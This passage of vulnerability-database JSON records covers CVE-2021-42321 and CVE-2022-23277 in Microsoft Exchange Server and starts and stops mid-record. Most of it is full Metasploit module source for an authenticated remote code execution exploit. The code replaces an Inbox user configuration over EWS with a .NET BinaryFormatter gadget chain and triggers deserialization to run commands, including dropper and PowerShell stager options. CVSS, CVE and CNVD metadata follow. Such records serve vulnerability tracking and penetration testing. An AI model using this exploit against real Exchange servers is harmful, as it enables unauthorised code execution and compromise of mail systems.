xml_tag.attribute('Id') && xml_tag.attribute('ChangeKey') \nfail_with(Failure::UnexpectedReply, 'Response obtained without expected Id and ChangeKey elements!') \nend \nchange_key_val = xml_tag.attribute('ChangeKey').value \nfolder_id_val = xml_tag.attribute('Id').value \nprint_good(\"ChangeKey value for Inbox folder is #{change_key_val}\") \nprint_good(\"ID value for Inbox folder is #{folder_id_val}\") \n \n# Delete the user configuration object that currently on the Inbox folder. \nprint_status('Deleting the user configuration object associated with Inbox folder...') \nxml_delete_inbox_user_config = %(<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soap:Header> \n<t:RequestServerVersion Version=\"Exchange2013\" /> \n</soap:Header> \n<soap:Body> \n<m:DeleteUserConfiguration> \n<m:UserConfigurationName Name=\"ExtensionMasterTable\"> \n<t:FolderId Id=\"#{folder_id_val}\" ChangeKey=\"#{change_key_val}\" /> \n</m:UserConfigurationName> \n</m:DeleteUserConfiguration> \n</soap:Body> \n</soap:Envelope>) \n \nres = send_request_cgi( \n{ \n'method' => 'POST', \n'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'), \n'data' => xml_delete_inbox_user_config, \n'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about. \n} \n) \nfail_with(Failure::Unreachable, 'Connection failed') if res.nil? \n \nunless res&.body \nfail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!') \nend \n \nif res.body =~ %r{<m:DeleteUserConfigurationResponseMessage ResponseClass=\"Success\"><m:ResponseCode>NoError</m:ResponseCode></m:DeleteUserConfigurationResponseMessage>} \nprint_good('Successfully deleted the user configuration object associated with the Inbox folder!') \nelse \nprint_warning('Was not able to successfully delete the existing user configuration on the Inbox folder!') \nprint_warning('Sometimes this may occur when there is not an existing config applied to the Inbox folder (default 2016 installs have this issue)!') \nend \n \n# Now to replace the deleted user configuration object with our own user configuration object. \nprint_status('Creating the malicious user configuration object on the Inbox folder!') \n \ngadget_chain = Rex::Text.encode_base64(Msf::Util::DotNetDeserialization.generate(cmd, gadget_chain: :ClaimsPrincipal, formatter: :BinaryFormatter)) \nxml_malicious_user_config = %(<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soap:Header> \n<t:RequestServerVersion Version=\"Exchange2013\" /> \n</soap:Header> \n<soap:Body> \n<m:CreateUserConfiguration> \n<m:UserConfiguration> \n<t:UserConfigurationName Name=\"ExtensionMasterTable\"> \n<t:FolderId Id=\"#{folder_id_val}\" ChangeKey=\"#{change_key_val}\" /> \n</t:UserConfigurationName> \n<t:Dictionary> \n<t:DictionaryEntry> \n<t:DictionaryKey> \n<t:Type>String</t:Type> \n<t:Value>OrgChkTm</t:Value> \n</t:DictionaryKey> \n<t:DictionaryValue> \n<t:Type>Integer64</t:Type> \n<t:Value>#{rand(1000000000000000000..9111999999999999999)}</t:Value> \n</t:DictionaryValue> \n</t:DictionaryEntry> \n<t:DictionaryEntry> \n<t:DictionaryKey> \n<t:Type>String</t:Type> \n<t:Value>OrgDO</t:Value> \n</t:DictionaryKey> \n<t:DictionaryValue> \n<t:Type>Boolean</t:Type> \n<t:Value>false</t:Value> \n</t:DictionaryValue> \n</t:DictionaryEntry> \n</t:Dictionary> \n<t:BinaryData>#{gadget_chain}</t:BinaryData> \n</m:UserConfiguration> \n</m:CreateUserConfiguration> \n</soap:Body> \n</soap:Envelope>) \n \nres = send_request_cgi( \n{ \n'method' => 'POST', \n'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'), \n'data' => xml_malicious_user_config, \n'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about. \n} \n) \nfail_with(Failure::Unreachable, 'Connection failed') if res.nil? \n \nunless res&.body \nfail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!') \nend \n \nunless res.body =~ %r{<m:CreateUserConfigurationResponseMessage ResponseClass=\"Success\"><m:ResponseCode>NoError</m:ResponseCode></m:CreateUserConfigurationResponseMessage>} \nfail_with(Failure::UnexpectedReply, 'Was not able to successfully create the malicious user configuration on the Inbox folder!') \nend \n \nprint_good('Successfully created the malicious user configuration object and associated with the Inbox folder!') \n \n# Deserialize our object. If all goes well, you should now have SYSTEM :) \nprint_status('Attempting to deserialize the user configuration object using a GetClientAccessToken request...') \nxml_get_client_access_token = %(<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soap:Header> \n<t:RequestServerVersion Version=\"Exchange2013\" /> \n</soap:Header> \n<soap:Body> \n<m:GetClientAccessToken> \n<m:TokenRequests> \n<t:TokenRequest> \n<t:Id>#{Rex::Text.rand_text_alphanumeric(4..50)}</t:Id> \n<t:TokenType>CallerIdentity</t:TokenType> \n</t:TokenRequest> \n</m:TokenRequests> \n</m:GetClientAccessToken> \n</soap:Body> \n</soap:Envelope>) \n \nres = send_request_cgi( \n{ \n'method' => 'POST', \n'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'), \n'data' => xml_get_client_access_token, \n'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about. \n} \n) \nfail_with(Failure::Unreachable, 'Connection failed') if res.nil? \n \nunless res&.body \nfail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!') \nend \n \nunless res.body =~ %r{<e:Message xmlns:e=\"http://schemas.microsoft.com/exchange/services/2006/errors\">An internal server error occurred. The operation failed.</e:Message>} \nfail_with(Failure::UnexpectedReply, 'Did not recieve the expected internal server error upon deserialization!') \nend \nend \nend \n`\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/166153/exchange_chainedserializationbinder_denylist_typo_rce.rb.txt"}, {"lastseen": "2022-08-22T16:13:32", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-22T00:00:00", "type": "packetstorm", "title": "Microsoft Exchange Server ChainedSerializationBinder Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42321", "CVE-2022-23277"], "modified": "2022-08-22T00:00:00", "id": "PACKETSTORM:168131", "href": "https://packetstormsecurity.com/files/168131/Microsoft-Exchange-Server-ChainedSerializationBinder-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'nokogiri' \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::Powershell \ninclude Msf::Exploit::Remote::HTTP::Exchange \ninclude Msf::Exploit::Deprecated \nmoved_from 'exploit/windows/http/exchange_chainedserializationbinder_denylist_typo_rce' \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Microsoft Exchange Server ChainedSerializationBinder RCE', \n'Description' => %q{ \nThis module exploits vulnerabilities within the ChainedSerializationBinder as used in \nExchange Server 2019 CU10, Exchange Server 2019 CU11, Exchange Server 2016 CU21, and \nExchange Server 2016 CU22 all prior to Mar22SU. \n \nNote that authentication is required to exploit these vulnerabilities. \n}, \n'Author' => [ \n'pwnforsp', # Original Bug Discovery \n'zcgonvh', # Of 360 noah lab, Original Bug Discovery \n'Microsoft Threat Intelligence Center', # Discovery of exploitation in the wild \n'Microsoft Security Response Center', # Discovery of exploitation in the wild \n'peterjson', # Writeup \n'testanull', # PoC Exploit \n'Grant Willcox', # Aka tekwizz123. That guy in the back who took the hard work of all the people above and wrote this module :D \n'Spencer McIntyre', # CVE-2022-23277 support and DataSet gadget chains \n'Markus Wulftange' # CVE-2022-23277 research \n], \n'References' => [ \n# CVE-2021-42321 references \n['CVE', '2021-42321'], \n['URL', 'https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-42321'], \n['URL', 'https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-november-9-2021-kb5007409-7e1f235a-d41b-4a76-bcc4-3db90cd161e7'], \n['URL', 'https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2021-exchange-server-security-updates/ba-p/2933169'], \n['URL', 'https://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398'], \n['URL', 'https://peterjson.medium.com/some-notes-about-microsoft-exchange-deserialization-rce-cve-2021-42321-110d04e8852'], \n# CVE-2022-23277 references \n['CVE', '2022-23277'], \n['URL', 'https://codewhitesec.blogspot.com/2022/06/bypassing-dotnet-serialization-binders.html'], \n['URL', 'https://testbnull.medium.com/note-nhanh-v%E1%BB%81-binaryformatter-binder-v%C3%A0-cve-2022-23277-6510d469604c'] \n], \n'DisclosureDate' => '2021-12-09', \n'License' => MSF_LICENSE, \n'Platform' => 'win', \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Windows Command', \n{ \n'Arch' => ARCH_CMD, \n'Type' => :win_cmd \n} \n], \n[ \n'Windows Dropper', \n{ \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :win_dropper, \n'DefaultOptions' => { \n'CMDSTAGER::FLAVOR' => :psh_invokewebrequest \n} \n} \n], \n[ \n'PowerShell Stager', \n{ \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :psh_stager \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'SSL' => true, \n'HttpClientTimeout' => 5, \n'WfsDelay' => 10 \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [ \nIOC_IN_LOGS, # Can easily log using advice at https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2021-exchange-server-security-updates/ba-p/2933169 \nCONFIG_CHANGES # Alters the user configuration on the Inbox folder to get the payload to trigger. \n] \n} \n) \n) \nregister_options([ \nOpt::RPORT(443), \nOptString.new('TARGETURI', [true, 'Base path', '/']), \nOptString.new('HttpUsername', [true, 'The username to log into the Exchange server as']), \nOptString.new('HttpPassword', [true, 'The password to use to authenticate to the Exchange server']) \n]) \nend \n \ndef post_auth? \ntrue \nend \n \ndef username \ndatastore['HttpUsername'] \nend \n \ndef password \ndatastore['HttpPassword'] \nend \n \ndef cve_2021_42321_vuln_builds \n# https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019 \n[ \n'15.1.2308.8', '15.1.2308.14', '15.1.2308.15', # Exchange Server 2016 CU21 \n'15.1.2375.7', '15.1.2375.12', # Exchange Server 2016 CU22 \n'15.2.922.7', '15.2.922.13', '15.2.922.14', # Exchange Server 2019 CU10 \n'15.2.986.5', '15.2.986.9' # Exchange Server 2019 CU11 \n] \nend \n \ndef cve_2022_23277_vuln_builds \n# https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019 \n[ \n'15.1.2308.20', # Exchange Server 2016 CU21 Nov21SU \n'15.1.2308.21', # Exchange Server 2016 CU21 Jan22SU \n'15.1.2375.17', # Exchange Server 2016 CU22 Nov21SU \n'15.1.2375.18', # Exchange Server 2016 CU22 Jan22SU \n'15.2.922.19', # Exchange Server 2019 CU10 Nov21SU \n'15.2.922.20', # Exchange Server 2019 CU10 Jan22SU \n'15.2.986.14', # Exchange Server 2019 CU11 Nov21SU \n'15.2.986.15' # Exchange Server 2019 CU11 Jan22SU \n] \nend \n \ndef check \n# Note we are only checking official releases here to reduce requests when checking versions with exchange_get_version \ncurrent_build_rex = exchange_get_version(exchange_builds: cve_2021_42321_vuln_builds + cve_2022_23277_vuln_builds) \nif current_build_rex.nil? \nreturn CheckCode::Unknown(\"Couldn't retrieve the target Exchange Server version!\") \nend \n \n@exchange_build = current_build_rex.to_s \n \nif cve_2021_42321_vuln_builds.include?(@exchange_build) \nCheckCode::Appears(\"Exchange Server #{@exchange_build} is vulnerable to CVE-2021-42321\") \nelsif cve_2022_23277_vuln_builds.include?(@exchange_build) \nCheckCode::Appears(\"Exchange Server #{@exchange_build} is vulnerable to CVE-2022-23277\") \nelse \nCheckCode::Safe(\"Exchange Server #{@exchange_build} does not appear to be a vulnerable version!\") \nend \nend \n \ndef exploit \nif @exchange_build.nil? # make sure the target build is known and if it's not (because the check was skipped), get it \n@exchange_build = exchange_get_version(exchange_builds: cve_2021_42321_vuln_builds + cve_2022_23277_vuln_builds)&.to_s \nif @exchange_build.nil? \nfail_with(Failure::Unknown, 'Failed to identify the target Exchange Server build version.') \nend \nend \n \nif cve_2021_42321_vuln_builds.include?(@exchange_build) \n@gadget_chain = :ClaimsPrincipal \nelsif cve_2022_23277_vuln_builds.include?(@exchange_build) \n@gadget_chain = :DataSetTypeSpoof \nelse \nfail_with(Failure::NotVulnerable, \"Exchange Server #{@exchange_build} is not a vulnerable version!\") \nend \n \ncase target['Type'] \nwhen :win_cmd \nexecute_command(payload.encoded) \nwhen :win_dropper \nexecute_cmdstager \nwhen :psh_stager \nexecute_command(cmd_psh_payload( \npayload.encoded, \npayload.arch.first, \nremove_comspec: true \n)) \nend \nend \n \ndef execute_command(cmd, _opts = {}) \n# Get the user's inbox folder's ID and change key ID. \nprint_status(\"Getting the user's inbox folder's ID and ChangeKey ID...\") \nxml_getfolder_inbox = %(<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soap:Header> \n<t:RequestServerVersion Version=\"Exchange2013\" /> \n</soap:Header> \n<soap:Body> \n<m:GetFolder> \n<m:FolderShape> \n<t:BaseShape>AllProperties</t:BaseShape> \n</m:FolderShape> \n<m:FolderIds> \n<t:DistinguishedFolderId Id=\"inbox\" /> \n</m:FolderIds> \n</m:GetFolder> \n</soap:Body> \n</soap:Envelope>) \n \nres = send_request_cgi( \n{ \n'method' => 'POST', \n'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'), \n'data' => xml_getfolder_inbox, \n'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about. \n} \n) \nfail_with(Failure::Unreachable, 'Connection failed') if res.nil? \n \nunless res&.body \nfail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!') \nend \n \nif res.code == 401 \nfail_with(Failure::NoAccess, \"Server responded with 401 Unauthorized for user: #{datastore['DOMAIN']}\\\\#{username}\") \nend \n \nxml_getfolder = res.get_xml_document \nxml_getfolder.remove_namespaces! \nxml_tag = xml_getfolder.xpath('//FolderId') \nif xml_tag.empty? \nprint_error('Are you sure the current user has logged in previously to set up their mailbox? It seems they may have not had a mailbox set up yet!') \nfail_with(Failure::UnexpectedReply, 'Response obtained but no FolderId element was found within it!') \nend \nunless xml_tag.attribute('Id') && xml_tag.attribute('ChangeKey') \nfail_with(Failure::UnexpectedReply, 'Response obtained without expected Id and ChangeKey elements!') \nend \nchange_key_val = xml_tag.attribute('ChangeKey').value \nfolder_id_val = xml_tag.attribute('Id').value \nprint_good(\"ChangeKey value for Inbox folder is #{change_key_val}\") \nprint_good(\"ID value for Inbox folder is #{folder_id_val}\") \n \n# Delete the user configuration object that currently on the Inbox folder. \nprint_status('Deleting the user configuration object associated with Inbox folder...') \nxml_delete_inbox_user_config = %(<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soap:Header> \n<t:RequestServerVersion Version=\"Exchange2013\" /> \n</soap:Header> \n<soap:Body> \n<m:DeleteUserConfiguration> \n<m:UserConfigurationName Name=\"ExtensionMasterTable\"> \n<t:FolderId Id=\"#{folder_id_val}\" ChangeKey=\"#{change_key_val}\" /> \n</m:UserConfigurationName> \n</m:DeleteUserConfiguration> \n</soap:Body> \n</soap:Envelope>) \n \nres = send_request_cgi( \n{ \n'method' => 'POST', \n'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'), \n'data' => xml_delete_inbox_user_config, \n'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about. \n} \n) \nfail_with(Failure::Unreachable, 'Connection failed') if res.nil? \n \nunless res&.body \nfail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!') \nend \n \nif res.body =~ %r{<m:DeleteUserConfigurationResponseMessage ResponseClass=\"Success\"><m:ResponseCode>NoError</m:ResponseCode></m:DeleteUserConfigurationResponseMessage>} \nprint_good('Successfully deleted the user configuration object associated with the Inbox folder!') \nelse \nprint_warning('Was not able to successfully delete the existing user configuration on the Inbox folder!') \nprint_warning('Sometimes this may occur when there is not an existing config applied to the Inbox folder (default 2016 installs have this issue)!') \nend \n \n# Now to replace the deleted user configuration object with our own user configuration object. \nprint_status('Creating the malicious user configuration object on the Inbox folder!') \n \nxml_malicious_user_config = %(<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soap:Header> \n<t:RequestServerVersion Version=\"Exchange2013\" /> \n</soap:Header> \n<soap:Body> \n<m:CreateUserConfiguration> \n<m:UserConfiguration> \n<t:UserConfigurationName Name=\"ExtensionMasterTable\"> \n<t:FolderId Id=\"#{folder_id_val}\" ChangeKey=\"#{change_key_val}\" /> \n</t:UserConfigurationName> \n<t:Dictionary> \n<t:DictionaryEntry> \n<t:DictionaryKey> \n<t:Type>String</t:Type> \n<t:Value>OrgChkTm</t:Value> \n</t:DictionaryKey> \n<t:DictionaryValue> \n<t:Type>Integer64</t:Type> \n<t:Value>#{rand(1000000000000000000..9111999999999999999)}</t:Value> \n</t:DictionaryValue> \n</t:DictionaryEntry> \n<t:DictionaryEntry> \n<t:DictionaryKey> \n<t:Type>String</t:Type> \n<t:Value>OrgDO</t:Value> \n</t:DictionaryKey> \n<t:DictionaryValue> \n<t:Type>Boolean</t:Type> \n<t:Value>false</t:Value> \n</t:DictionaryValue> \n</t:DictionaryEntry> \n</t:Dictionary> \n<t:BinaryData>#{Rex::Text.encode_base64(Msf::Util::DotNetDeserialization.generate(cmd, gadget_chain: @gadget_chain, formatter: :BinaryFormatter))}</t:BinaryData> \n</m:UserConfiguration> \n</m:CreateUserConfiguration> \n</soap:Body> \n</soap:Envelope>) \n \nres = send_request_cgi( \n{ \n'method' => 'POST', \n'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'), \n'data' => xml_malicious_user_config, \n'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about. \n} \n) \nfail_with(Failure::Unreachable, 'Connection failed') if res.nil? \n \nunless res&.body \nfail_with(Failure::UnexpectedReply, 'Response obtained but it was empty!') \nend \n \nunless res.body =~ %r{<m:CreateUserConfigurationResponseMessage ResponseClass=\"Success\"><m:ResponseCode>NoError</m:ResponseCode></m:CreateUserConfigurationResponseMessage>} \nfail_with(Failure::UnexpectedReply, 'Was not able to successfully create the malicious user configuration on the Inbox folder!') \nend \n \nprint_good('Successfully created the malicious user configuration object and associated with the Inbox folder!') \n \n# Deserialize our object. If all goes well, you should now have SYSTEM :) \nprint_status('Attempting to deserialize the user configuration object using a GetClientAccessToken request...') \nxml_get_client_access_token = %(<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" xmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soap:Header> \n<t:RequestServerVersion Version=\"Exchange2013\" /> \n</soap:Header> \n<soap:Body> \n<m:GetClientAccessToken> \n<m:TokenRequests> \n<t:TokenRequest> \n<t:Id>#{Rex::Text.rand_text_alphanumeric(4..50)}</t:Id> \n<t:TokenType>CallerIdentity</t:TokenType> \n</t:TokenRequest> \n</m:TokenRequests> \n</m:GetClientAccessToken> \n</soap:Body> \n</soap:Envelope>) \n \nbegin \nsend_request_cgi( \n{ \n'method' => 'POST', \n'uri' => normalize_uri(datastore['TARGETURI'], 'ews', 'exchange.asmx'), \n'data' => xml_get_client_access_token, \n'ctype' => 'text/xml; charset=utf-8' # If you don't set this header, then we will end up sending a URL form request which Exchange will correctly complain about. \n} \n) \nrescue Errno::ECONNRESET \n# when using the DataSetTypeSpoof gadget, it's expected that this connection reset exception will be raised \nend \nend \nend \n`\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/168131/exchange_chainedserializationbinder_rce.rb.txt"}], "cve": [{"lastseen": "2023-02-09T14:33:21", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-10T01:19:00", "type": "cve", "title": "CVE-2021-42321", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42321"], "modified": "2022-08-29T18:59:00", "cpe": ["cpe:/a:microsoft:exchange_server:2016", "cpe:/a:microsoft:exchange_server:2019"], "id": "CVE-2021-42321", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-42321", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_10:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_21:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_22:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_11:*:*:*:*:*:*"]}], "githubexploit": [{"lastseen": "2023-03-03T11:29:25", "description": "# exch_CVE-2021-42321\n\n## \u672c\u6587\u662f7bits\u5b89\u5168\u56e2\u961f\u6587\u7ae0\u300aDo...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-08T13:00:23", "type": "githubexploit", "title": "Exploit for CVE-2021-42321", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42321"], "modified": "2023-03-03T10:25:54", "id": "4A657558-ABE9-5708-B292-B836048EF1AD", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-03-13T21:27:54", "description": "# CVE-2021-42321\nMicrosoft...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-23T02:26:26", "type": "githubexploit", "title": "Exploit for CVE-2021-42321", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42321"], "modified": "2023-03-13T18:05:45", "id": "55F902F5-E290-577E-A48D-FB56855B1CBB", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}], "cnvd": [{"lastseen": "2022-11-05T08:35:07", "description": "Microsoft Exchange Server is a set of email service programs from Microsoft Corporation (USA). Microsoft Exchange Server is a remote code execution vulnerability that can be exploited by attackers to remotely execute arbitrary code on the server by sending specially crafted malicious data to the server.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-12T00:00:00", "type": "cnvd", "title": "Microsoft Exchange Server Remote Code Execution Vulnerability (CNVD-2021-90307)", "bulletinFamily": "cnvd", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 